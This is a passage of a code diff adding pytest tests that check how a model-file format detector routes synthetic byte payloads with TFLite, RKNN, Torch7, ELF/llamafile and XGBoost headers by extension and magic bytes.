("flatbuffer.pb", b"\x00\x00\x00\x00TFL3protobuf-ish payload", "protobuf"), + ("prefixed.meta", b"RKNN\x01\x00\x00\x00metagraph-ish payload", "unknown"), + ("flatbuffer.meta", b"\x00\x00\x00\x00TFL3metagraph-ish payload", "unknown"), + ], +) +def test_owned_protobuf_extensions_are_not_stolen_by_raw_binary_routes( + tmp_path: Path, + filename: str, + payload: bytes, + expected_format: str, +) -> None: + path = tmp_path / filename + path.write_bytes(payload) + + assert detect_file_format(str(path)) == expected_format + assert detect_file_format_from_magic(str(path)) == "unknown" + + def test_detect_torch7_formats_by_signature(tmp_path: Path) -> None: torch7_path = tmp_path / "model.t7" torch7_path.write_bytes(b"T7\x00\x00torch.FloatTensor nn.Sequential\n") @@ -1149,12 +1171,30 @@ def test_torch7_magic_rejects_malformed_ascii_version_header(tmp_path: Path) -> def test_torch7_magic_keeps_binary_marker_only_routing(tmp_path: Path) -> None: - torch7_path = tmp_path / "renamed.bin" + torch7_path = tmp_path / "renamed.weights" torch7_path.write_bytes(b"\x01\x00torch.FloatTensor nn.Sequential\n") assert detect_file_format_from_magic(str(torch7_path)) == "torch7" +@pytest.mark.parametrize( + "payload", + [ + b"RKNN\x01\x00\x00\x00payload" + b"\x7fELF" + b"\x00" * 128, + b"T7\x00\x00payload torch.FloatTensor nn.Sequential " + b"\x7fELF" + b"\x00" * 128, + b"\x0c\x00\x00\x00ET13\x04\x00\x04\x00\x04\x00\x00\x00" + b"\x7fELF" + b"\x00" * 128, + b"\x00\x00\x00\x00TFL3payload" + b"\x7fELF" + b"\x00" * 128, + ], + ids=["rknn", "torch7", "executorch", "tflite"], +) +def test_bin_files_keep_pytorch_binary_routing_for_raw_content_signatures(tmp_path: Path, payload: bytes) -> None: + model_path = tmp_path / "weights.bin" + model_path.write_bytes(payload) + + assert detect_file_format(str(model_path)) == "pytorch_binary" + assert detect_file_format_from_magic(str(model_path)) == "unknown" + + def test_torch7_markers_in_gzip_header_do_not_override_tar_archive(tmp_path: Path) -> None: tar_payload = io.BytesIO() with tarfile.open(fileobj=tar_payload, mode="w") as archive: @@ -1657,6 +1697,15 @@ def test_detect_file_format_disguised_llamafile_by_content(tmp_path: Path) -> No assert detect_file_format_from_magic(str(near_match)) == "unknown" +def test_extensionless_llamafile_route_preempts_tflite_header_bytes(tmp_path: Path) -> None: + extensionless_llamafile = tmp_path / "llama" + extensionless_llamafile.write_bytes(b"\x7fELFTFL3" + b"\x00" * 56 + b"llamafile runtime") + + assert detect_file_format(str(extensionless_llamafile)) == "llamafile" + assert detect_file_format_from_magic(str(extensionless_llamafile)) == "llamafile" + assert detect_file_format_for_skip_filter(str(extensionless_llamafile)) == "llamafile" + + def test_detect_file_format_routes_extensionless_xgboost_ubjson_by_structure(tmp_path: Path) -> None: model_file = tmp_path / "model" model_file.write_bytes( @@ -1695,6 +1744,28 @@ def test_detect_file_format_routes_extensionless_xgboost_ubjson_with_noop_before assert detect_file_format_for_skip_filter(str(model_file)) == "xgboost" +def test_extensionless_xgboost_route_preempts_incidental_tflite_identifier(tmp_path: Path) -> None: + model_file = tmp_path / "model" + model_file.write_bytes( + b"{N" + + _ubjson_key(b"TFL3") + + b"Z" + + _ubjson_key(b"learner") + + b"{" + + _ubjson_key(b"learner_model_param") + + b"{}" + + b"}" + + _ubjson_key(b"version") + + b"[]" + + b"}" + ) + + assert model_file.read_bytes()[4:8] == b"TFL3" + assert detect_file_format(str(model_file)) == "xgboost" + assert detect_file_format_from_magic(str(model_file)) == "xgboost" + assert detect_file_format_for_skip_filter(str(model_file)) == "xgboost" + + def test_detect_file_format_routes_extensionless_xgboost_ubjson_with_noop_before_counted_root_header( tmp_path: Path, ) -> None: